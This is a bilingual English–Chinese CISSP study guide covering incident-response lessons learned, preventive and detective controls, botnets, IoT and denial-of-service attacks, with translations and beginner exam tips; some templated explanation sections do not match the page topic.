For example, administrators may realize that attacks are getting through undetected and increase their detection capabilities and recommend changes to their intrusion detection systems. It is common for the incident response team to create a report when they complete a lessons learned review. Based on the findings, the team may recommend changes to procedures, the addition of security controls, or even changes to policies. Management will decide what recommendations to implement and is responsible for the remaining risk for any recommendations they reject.

中文直译 / 整理

应用程序以包含输入验证功能。 也许数据库位于Web服务器上,而不是位于后端 数据库服务器上。 修复措施可能包括将数据库迁移到额外防火墙后的服务器上。 经验教训 在经验教训阶段,人员会审查事件及其响应,以确定是否有可吸取的教训。 事件响应团队将参与此阶段,但其他了解该事件的员工也会参与。 在审查事件响应时,人员会寻找可以改进响应的任何方面。 例如,如果响应团 队花费了较长时间来控制事件,审查将试图确定原因。 可能是人员缺乏足够的 培训,或缺乏有效响应所需的知识和专业技能。 他们在收到首次通知时可能未 能识别出事件,导致攻击持续了比必要更长的时间。 一线响应人员可能未意识 到保护证据的必要性,并在响应过程中无意中破坏了证据。 请记住,本阶段的输出可以反馈到事件管理的检测阶段。 例如,管理员可能 意识到攻击未被检测到,从而增强其检测能力,并建议改进其入侵检测系统。 事件响应团队在完成经验教训回顾后,通常会创建一份报告。 根据调查结果, 团队可能会建议修改流程、增加安全控制措施,甚至更改政策。 管理层将决定 实施哪些建议,并对任何被拒绝的建议所遗留的风险负责。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 11 / PDF P1148

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Delegating Incident Management to Users In one organization where one of the authors worked, the responsibility to respond to computer infections was extended to users. Close to each computer was a checklist that identified common symptoms of malware infection. If users suspected their computers were infected, the checklist instructed them to disable or disconnect the network adapter and contact the help desk to report the issue. By disabling or disconnecting the network adapter, they helped contain the malware to their system and stopped it from spreading any further.

This isn't possible in all organizations, but in this case, users were part of a very large network operations center, and they were all involved in some form of computer support. In other words, they weren't typical end users but instead had a substantial amount of technical expertise. Implementing Detection and Preventive Measures Ideally, an organization can avoid incidents completely by implementing preventive countermeasures. However, no matter how effective preventive countermeasures are, incidents will still happen. Other controls help detect incidents and respond to them. Chapter 2, “Personnel Security and Risk Management Concepts,” discusses controls in more depth.

This section covers many of the specific controls designed to prevent and detect security incidents. As a reminder, the following list describes preventive and detection controls: Preventive Control A preventive control attempts to thwart or stop unwanted or unauthorized activity from occurring. Examples of preventive controls are fences, locks, biometrics, separation of duties policies, job rotation policies, data classification, access control methods, encryption, smartcards, callback procedures, security policies, security awareness training, antivirus software, firewalls, and intrusion prevention systems.

中文直译 / 整理

将事件管理委托给用户 在其中一位作者曾工作过的一家组织中,应对计算机感染的责任被扩展到 了用户。 每台计算机旁都张贴了一份清单,列出了恶意软件感染的常见症 状。 如果用户怀疑自己的计算机被感染,清单会指示他们禁用或断开网络 适配器,并联系帮助台报告问题。 通过禁用或断开网络适配器,他们帮助 将恶意软件限制在自身系统内,阻止其进一步传播。 这在所有组织中都不可行,但在本例中,用户属于一个非常大的网络运营 中心,且都以某种形式参与计算机支持工作。 换句话说,他们并非典型的 最终用户,而是具备相当程度的技术专长。 实施检测与预防措施 理想情况下,组织可以通过实施预防性对策完全避免事件发生。 然而,无论 预防性对策多么有效,事件仍会发生。 其他控制措施有助于检测事件并作出 响应。 第2章,“人员安全与风险管理概念”更深入地讨论了控制措施。 本节涵盖 了多种旨在预防和检测安全事件的具体控制措施。 提醒一下,以下列表描述 了预防性和检测性控制措施: 预防控制 预防控制 旨在阻止或制止未经授权或不希望发生的活动。

预防控制 的例子包括围栏、锁、生物识别、职责分离策略、岗位轮换策略、数据分类、 访问控制方法、加密、智能卡、回拨程序、安全策略、安全意识培训、防病毒 软件、防火墙和入侵预防系统。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

分类由数据所有者决定,保护由保管者实施。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
防火墙 防火墙根据规则控制网络流量进出。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 12 / PDF P1149

第 1149 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Detection Control A detection control attempts to discover or detect unwanted or unauthorized activity. Detection controls operate after the fact and can discover the activity only after it has occurred. Examples of detection controls are security guards, motion detectors, recording and reviewing of events captured by security cameras or closed-circuit television (CCTV), job rotation policies, mandatory vacation policies, audit trails, honeypots or honeynets, intrusion detection systems, violation reports, supervision and reviews of users, and incident investigations. You may notice the use of both preventative and preventive.

Although most documentation currently uses only preventive, the CISSP objectives include both usages. For example, Domain 1 includes references to preventive controls. This chapter covers objectives from Domain 7, and Domain 7 refers to preventative measures. For simplicity, we are using preventive in this chapter, except when quoting the CISSP objectives. Basic Preventive Measures Although there is no single step you can take to protect against all attacks, you can take some basic steps that go a long way to protect against many types of attacks. Many of these steps are described in more depth in other areas of the book but are listed here as an introduction to this section.

Keep systems and applications up-to-date. Vendors regularly release patches to correct bugs and security flaws, but these only help when they're applied. Patch management (covered in Chapter 16, “Managing Security Operations”) ensures that systems and applications are kept up-to-date with relevant patches. Remove or disable unneeded services and protocols. If a system doesn't need a service or protocol, it should not be running. Attackers cannot exploit a vulnerability in a service or protocol that isn't running on a system. As an extreme contrast, imagine a web server is running every available service and protocol.

It is vulnerable to potential attacks on any of these services and protocols. Use intrusion detection and prevention systems. Intrusion detection and prevention systems observe activity, attempt to detect attacks, and

中文直译 / 整理

检测控制 检测控制 旨在发现或检测未经授权或不希望发生的活动。 检测控制在 事件发生后运行,只能在活动发生后发现它。 检测控制的例子包括保安、运动探 测器、安全摄像头或闭路电视(CCTV)记录的事件回放与审查、岗位轮换策略、 强制休假政策、审计跟踪、蜜罐或蜜网、入侵检测系统、违规报告、用户监督与 审查,以及事件调查。 您可能会注意到同时使用了preventative和preventive。 尽管目前大多 数文档仅使用preventive,但CISSP目标中包含了这两种用法。 例如,领域 1中提到了预防性控制措施。 本章涵盖的是领域7的目标,而领域7则提及预 防性措施。 为简化起见,本章统一使用preventive,除非直接引用 CISSP目标。 基本预防措施 虽然无法通过单一措施防范所有攻击,但采取一些基本步骤可以显著降低多 种攻击的风险。 这些步骤中的许多内容在本书的其他部分有更深入的描述, 此处仅作为本节的概要列出。 保持系统和应用程序更新。 供应商会定期发布补丁以修复漏洞和安全缺陷,但 只有在应用这些补丁后才能发挥作用。 补丁管理(详见第16章,“安全管理运 营”)可确保系统和应用程序及时应用相关补丁。

移除或禁用不必要的服务和协议。 如果系统不需要某项服务或协议,则不应运 行它。 攻击者无法利用系统上未运行的服务或协议中的漏洞。 作为极端对比, 想象一个Web服务器运行了所有可用的服务和协议,那么它将面临这些服务和 协议中任何潜在攻击的风险。 使用入侵检测和预防系统。 入侵检测和预防系统监控活动,尝试检测攻击,并

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1149 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 13 / PDF P1150

第 1150 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

provide alerts. Intrusion prevention systems can often block or stop attacks. These systems are described in more depth later in this chapter. Use up-to-date anti-malware software. Chapter 21, “Malicious Code and Application Attacks,” covers various types of malicious code such as viruses and worms. A primary countermeasure is anti-malware software, covered later in this chapter. Use firewalls. Firewalls can prevent many different types of attacks. Network-based firewalls protect entire networks, and host-based firewalls protect individual systems.

Chapter 11, “Secure Network Architecture and Components,” included information on using firewalls within a network, and this chapter includes a section describing how firewalls can prevent attacks. Implement configuration and system management processes. Configuration and system management processes help ensure that systems are deployed in a secure manner and remain in a secure state throughout their lifetimes. Chapter 16 covers configuration and change management processes. Thwarting an attacker's attempts to breach your security requires vigilant efforts to keep systems patched and properly configured.

Firewalls and intrusion detection and prevention systems often provide the means to detect and gather evidence to prosecute attackers that have breached your security. Understanding Attacks Security professionals need to be aware of common attack methods so that they can take proactive steps to prevent them, recognize them when they occur, and respond appropriately in response to an attack. This section provides an overview of many common attacks. The following sections discuss many of the preventive measures used to thwart these and other attacks.

中文直译 / 整理

发出警报。 入侵预防系统通常可以阻止或终止攻击。 这些系统将在本章后续部分 更详细地介绍。 使用最新的反恶意软件软件。 第21章,“恶意代码和应用程序攻击”介绍了 各种类型的恶意代码,例如病毒和蠕虫。 主要的应对措施是反恶意软件软件, 本章后续将进行介绍。 使用防火墙。 防火墙可以防止多种不同类型的攻击。 基于网络的防火墙保护整 个网络,基于主机的防火墙保护单个系统。 第11章,“安全网络架构与组件” 包含了有关在网络中使用防火墙的信息,本章还包括一节描述防火墙如何防止攻 击。 实施配置和系统管理流程。 配置和系统管理流程有助于确保系统以安全的方式部署,并在其整个生命周 期内保持安全状态。 第16章涵盖了配置和变更管理流程。 阻止攻击者突破您的安全防护需要持续努力以保持系统补丁更新和正 确配置。 防火墙以及入侵检测和预防系统通常能提供检测和收集证据的手 段,以起诉已突破您安全防护的攻击者。 了解攻击 安全专业人员需要了解常见的攻击方法,以便能够采取主动措施预防攻击, 在攻击发生时识别它们,并对攻击做出适当响应。 本节概述了多种常见攻击。 后续章节将讨论用于防范这些及其他攻击的多种防护措施。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1150 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 14 / PDF P1151

第 1151 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

We've attempted to avoid duplication of specific attacks but also provide a comprehensive coverage of different types of attacks throughout this book. In addition to this chapter, you'll see different types of attacks in other chapters. For example, Chapter 7, “PKI and Cryptographic Applications,” covered some cryptographic attacks; Chapter 12, “Secure Communications and Network Attacks,” covered different types of network-based attacks; Chapter 14, “Controlling and Monitoring Access,” covered various access control attacks; and Chapter 21 covers various attacks related to malicious code and applications. Botnets Botnets are quite common today.

The computers in a botnet are like robots (referred to as bots and sometimes zombies). Multiple bots in a network form a botnet and will do whatever attackers instruct them to do. A bot herder is typically a criminal who controls all the computers in the botnet via one or more command-and-control (C&C or C2) servers. The bot herder enters commands on the server, and the bots check in with the command-and-control server to receive instructions. Bots can be programmed to contact the server periodically or remain dormant until a specific programmed date and time or in response to an event, such as when specific traffic is detected.

Bot herders commonly instruct the bots within a botnet to launch a wide range of DDoS attacks, send spam and phishing emails, or rent the botnets out to other criminals. Computers are typically joined to a botnet after being infected with some type of malicious code or malicious software. Once the computer is infected, it often gives the bot herder remote access to the system and additional malware is installed. In some cases, the bots install malware on the infected systems. These may search for files that include passwords or other information of interest to the attacker. The malware sometimes installs keyloggers to capture user keystrokes and send them back to the attacker.

Bot herders often issue commands to the bots, causing them to launch attacks. Botnets of more than 40,000 computers are relatively common, and botnets controlling millions of systems have been active in the past. Some bot herders control more than one botnet.

中文直译 / 整理

我们已尽量避免重复描述特定攻击,同时在本书中全面覆盖了不同类型 的攻击。 除了本章外,您还会在其他章节中看到不同类型的攻击。 例如,第 7章“PKI与加密应用”介绍了某些加密攻击; 第12章“安全通信与网络攻击” 介绍了不同类型的基于网络的攻击; 第14章“访问控制与监控”介绍了各种 访问控制攻击; 第21章则涵盖了与恶意代码和应用程序相关的各种攻击。 僵尸网络 僵尸网络如今非常普遍。 僵尸网络中的计算机就像机器人(称为bots,有时也 称为zombies)。 网络中的多个机器人组成一个僵尸网络,并会执行攻击者指示 的任何操作。 僵尸网络控制者通常是通过一个或多个命令与控制(C&C 或 C2) 服务器来控制僵尸网络中所有计算机的罪犯。 僵尸网络控制者在服务器上输入命令,而机器人则定期与命令与控制服务器通 信以接收指令。 机器人可以被编程为周期性地联系服务器,或保持休眠状态, 直到到达特定的编程日期和时间,或在检测到特定事件(如特定流量)时激活。 僵尸网络控制者通常指示僵尸网络中的机器人发起各种DDoS攻击、发送垃圾 邮件和钓鱼邮件,或将僵尸网络出租给其他罪犯。 计算机通常在感染了某种恶意代码或恶意软件后加入僵尸网络。

一旦计算机被 感染,它通常会向僵尸网络控制者提供对系统的远程访问权限,并安装更多恶 意软件。 在某些情况下,机器人会在受感染的系统上安装恶意软件。 这些软件 可能会搜索包含密码或其他攻击者感兴趣信息的文件。 恶意软件有时会安装键 盘记录器,以捕获用户的按键并将其发送回攻击者。 僵尸网络控制者经常向机 器人发出指令,使其发起攻击。 拥有超过40,000台计算机的僵尸网络相对常见,过去曾出现过控制数百万系统 的僵尸网络。 一些僵尸网络控制者同时控制多个僵尸网络。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

公钥基础设施 PKI:PKI 用证书、CA、注册、吊销等机制管理公钥信任。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1151 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 15 / PDF P1152

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

There are many methods of protecting systems from being joined to a botnet, so it's best to use a defense-in-depth strategy, implementing multiple layers of security. Because systems are typically joined to a botnet after becoming infected with malware, it's important to ensure that systems and networks are protected with up-to-date anti-malware software. Some malware takes advantage of unpatched flaws in operating systems and applications, so keeping a system up-to-date with patches helps keep it protected. However, attackers are increasingly creating new malware that bypasses the antimalware software, at least temporarily.

They are also discovering vulnerabilities that don't have patches available yet. Educating users is extremely important as a countermeasure against botnet infections. Worldwide, attackers are almost constantly sending out malicious phishing emails. Some include malicious attachments that join systems to a botnet if the user opens them. Others include links to malicious sites that attempt to download malicious software or try to trick the user into downloading the malicious software. Others try to trick users into giving up their passwords, and attackers then use these harvested passwords to infiltrate systems and networks.

Training users about these attacks and maintaining a high level of security awareness can often help prevent many attacks. Many malware infections are browser-based, allowing user systems to become infected when the user is surfing the web. Keeping browsers and their plug-ins up-to-date is an important security practice. Additionally, most browsers have strong security built-in, and these features shouldn't be disabled. For example, most browsers support sandboxing (covered later in the “Sandboxing” section of this chapter) to isolate web applications, but some browsers include the ability to disable sandboxing.

Disabling sandboxing might improve the performance of the browser slightly, but the risk is significant.

中文直译 / 整理

有多种方法可以保护系统免受加入僵尸网络的影响,因此最好采用深度防御策 略,实施多层安全措施。 由于系统通常在感染恶意软件后加入僵尸网络,因此 确保系统和网络使用最新的反恶意软件软件进行保护非常重要。 某些恶意软件 会利用操作系统和应用程序中未修补的漏洞,因此及时为系统打补丁有助于保 持其安全性。 然而,攻击者正越来越多地创建能够绕过反恶意软件软件的新恶 意软件,至少在短期内如此。 他们还在发现尚无补丁可用的漏洞。 教育用户是应对僵尸网络感染的重要措施。 在全球范围内,攻击者几乎持续不 断地发送恶意钓鱼邮件。 其中一些包含恶意附件,如果用户打开,就会将系统 加入僵尸网络; 另一些包含指向恶意网站的链接,这些链接试图下载恶意软件, 或诱骗用户下载恶意软件; 还有一些试图诱骗用户提供密码,攻击者随后利用 这些窃取的密码入侵系统和网络。 通过培训用户识别这些攻击并保持高度的安 全意识,通常有助于防止许多攻击。 许多恶意软件感染是基于浏览器的,当用户浏览网页时,其系统可能会被感染。 保持浏览器及其插件更新是一项重要的安全实践。 此外,大多数浏览器都内置 了强大的安全功能,这些功能不应被禁用。

例如,大多数浏览器支持沙箱机制 (本章后续“沙箱”部分将介绍),用于隔离网页应用,但某些浏览器也提供 了禁用沙箱的功能。 禁用沙箱可能会略微提升浏览器的性能,但风险十分显著。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 16 / PDF P1153

第 1153 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Botnets, IoT, and Embedded Systems Attackers have traditionally infected desktop and laptop computers with malware and joined them to botnets. Although this still occurs, attackers have been expanding their reach to the Internet of Things (IoT). For example, attackers used the Mirai malware to launch a DDoS attack on DNS servers hosted by Dyn. Most of the devices involved in this attack were IoT devices such as internet-connected cameras, digital video recorders, and home-based routers that were infected and added to the Mirai botnet. The attack effectively prevented users from accessing many popular websites such as Twitter, Netflix, Amazon, Reddit, Spotify, and more.

The research company Gartner estimates there are as many as 20 billion IoT devices in use in 2020, giving attackers many more targets. Embedded systems include any device with a processor, an operating system, and one or more dedicated apps. Some examples include devices that control traffic lights, medical equipment, automatic teller machines (ATMs), printers, thermostats, digital watches, and digital cameras. Many automobiles include multiple embedded systems such as those used for cruise control, backup sensors, rain/wiper sensors, dashboard displays, engine controls and monitors, suspension controls, and more.

When any of these devices have connectivity to the Internet, they become part of the IoT. This explosion of embedded systems is certainly improving many products. However, if they have internet access, it's just a matter of time before attackers figure out how to exploit them. Ideally, manufacturers will design and build them with security in mind and include methods to easily update them. Denial-of-Service Attacks Denial-of-service (DoS) attacks prevent a system from processing or responding to legitimate traffic or requests for resources and objects. A common form of a DoS attack will transmit so many data packets to a server that it cannot process them all.

中文直译 / 整理

僵尸网络、物联网和嵌入式系统 攻击者传统上会将恶意软件感染到台式机和笔记本电脑上,并将其加入僵尸网 络。 尽管这种情况仍在发生,但攻击者已开始将目标扩展到物联网(IoT)。 例如,攻击者利用Mirai恶意软件对由Dyn托管的DNS服务器发动了 DDoS攻击。 此次攻击中涉及的大多数设备都是物联网设备,如联网摄像头、 数字视频录像机和家用路由器,这些设备被感染并加入Mirai僵尸网络。 该 攻击有效阻止了用户访问许多流行网站,如Twitter、Netflix、A mazon、Reddit、Spotify等。 研究公司Gartner估计,2020年全球在用 的物联网设备多达200亿台,为攻击者提供了更多目标。 嵌入式系统包括任何具有处理器、操作系统和一个或多个专用应用程序的 设备。 一些示例包括控制交通信号灯的设备、医疗设备、自动取款机( ATM)、打印机、恒温器、数字手表和数码相机。 许多汽车包含多个嵌入 式系统,例如用于定速巡航、倒车传感器、雨刮传感器、仪表盘显示、发 动机控制与监控、悬挂控制等的系统。 当这些设备中的任何一个连接到互 联网时,它们就成为物联网的一部分。 嵌入式系统的激增无疑正在改善许多产品。

然而,如果它们具有互联网访 问权限,攻击者只是时间问题就能找到利用它们的方法。 理想情况下,制 造商在设计和制造时应将安全性纳入考量,并包含易于更新的方法。 拒绝服务攻击 拒绝服务(DoS)攻击会阻止系统处理或响应合法的流量或对资源和对象的请 求。 一种常见的DoS攻击形式是向服务器发送大量数据包,使其无法全部处理。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1153 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 17 / PDF P1154

第 1154 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Other forms of DoS attacks focus on the exploitation of a known fault or vulnerability in an operating system, service, or application. Exploiting the fault often results in a system crash or 100 percent CPU utilization. No matter what the actual attack consists of, any attack that renders its victim unable to perform normal activities is a DoS attack. DoS attacks can result in decreased performance, system crashes, system reboots, data corruption, blockage of services, and more. A DoS attack comes from a single system and targets a single system. Of course, this can easily telegraph the attack source. Attackers try to remain anonymous by spoofing the source address.

Other times they use a compromised system to launch attacks. The key is that the source address in a DoS attack is rarely the attacker's IP address. Another form of DoS attack is a distributed denial-of-service (DDoS) attack. A DDoS attack occurs when multiple systems attack a single system at the same time. As an example, a group of attackers would launch coordinated attacks against a single system. More often today, though, an attacker will compromise several systems and use them as launching platforms against other victims. Attackers commonly use botnets to launch DDoS attacks as discussed in the previous section. DoS attacks are typically aimed at internet-facing systems.

